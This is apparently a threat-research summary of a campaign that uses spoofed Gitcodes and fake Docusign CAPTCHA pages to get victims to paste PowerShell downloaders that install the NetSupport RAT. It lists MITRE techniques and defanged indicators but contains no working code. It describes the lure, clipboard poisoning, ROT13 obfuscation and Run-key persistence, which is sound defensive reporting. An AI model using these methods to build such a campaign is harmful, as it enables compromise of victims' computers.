Threat Research

How Threat Actors Exploit Human Trust: A Breakdown of the ‘Prove You Are Human’ Malware Scheme

DTIdomain
How Threat Actors Exploit Human Trust: A Breakdown of the ‘Prove You Are Human’ Malware Scheme

A malicious campaign uses deceptive websites like spoofed Gitcodes and fake Docusign CAPTCHA pages to trick users into executing PowerShell scripts that install the NetSupport RAT on Windows machines. The multi-stage script downloaders evade detection by breaking the infection process into multiple phases, ultimately establishing persistence and control over victims’ systems. #NetSupportRAT #Gitcodes #DocusignSpoof

Keypoints

  • Attackers host malicious multi-stage PowerShell downloader scripts on spoofed Gitcodes and fake Docusign verification websites to distribute NetSupport RAT.
  • Victims are deceived into copying and pasting malicious scripts into the Windows Run prompt, initiating multi-stage payload downloads and execution.
  • The scripts use legitimate tools such as 7zip and modify Windows Registry “Run” keys to establish persistence under disguised names like “My Support.”
  • The campaign uses clipboard poisoning and ROT13 encoding techniques to evade signature-based detection and complicate analysis.
  • Associated infrastructure includes domains behind Cloudflare, registered with providers like NameCheap and NameSilo, and SSL certificates issued by WE1.
  • Related phishing campaigns leverage lookalike domains to mimic Docusign’s CAPTCHA pages and employ AJAX-based command and control (C2) to track infection progress.
  • Similar tactics and infrastructure patterns link this activity to known threat clusters that have previously abused NetSupport RAT, such as SocGholish and FIN7.

MITRE Techniques

  • [T1059.001] PowerShell – Attackers use PowerShell scripts as multi-stage downloaders to retrieve and execute additional payloads. (“the attacker uses malicious multi-stage downloader Powershell scripts…”)
  • [T1543.003] Windows Service – Persistence is achieved by creating new registry Run key entries to automatically start malware (“creates a new entry in the Windows Registry’s ‘Run’ key for the current user”).
  • [T1115] Clipboard Data – Clipboard poisoning is used to copy the malicious encoded script into the clipboard for the victim to paste and execute (“‘unsecuredCopyToClipboard()’ function is called, copying an encoded multi-layered string to the user’s clipboard”).
  • [T1071.001] Web Protocols – The malware performs multiple HTTP requests to C2 domains to check in and download further stages (“script reaches out to https[:]//tradingviewtool[.]com/info2.php…” and “makes an AJAX GET request to c.php every second”).
  • [T1027] Obfuscated Files or Information – The initial script on the Docusign spoofed site is ROT13 encoded to avoid detections (“initially ROT13 encoded, likely to avoid signature detections and obfuscation”).

Indicators of Compromise

  • [Domain] Malicious downloader hosting and C2 infrastructure – gitcodes[.]org, docusign.sa[.]com, tradingviewtool[.]com, tradingviewtoolz[.]com, mhousecreative[.]com
  • [File Hash] NetSupport RAT payload hashes – 3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7, 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd (zip file)
  • [File Name] Persistence and downloader executables – client32.exe, wbdims.exe, jp2launcher.exe
  • [IP Address] Associated network activity – 170.130.55[.]203:443

Read more: https://dti.domaintools.com/how-threat-actors-exploit-human-trust/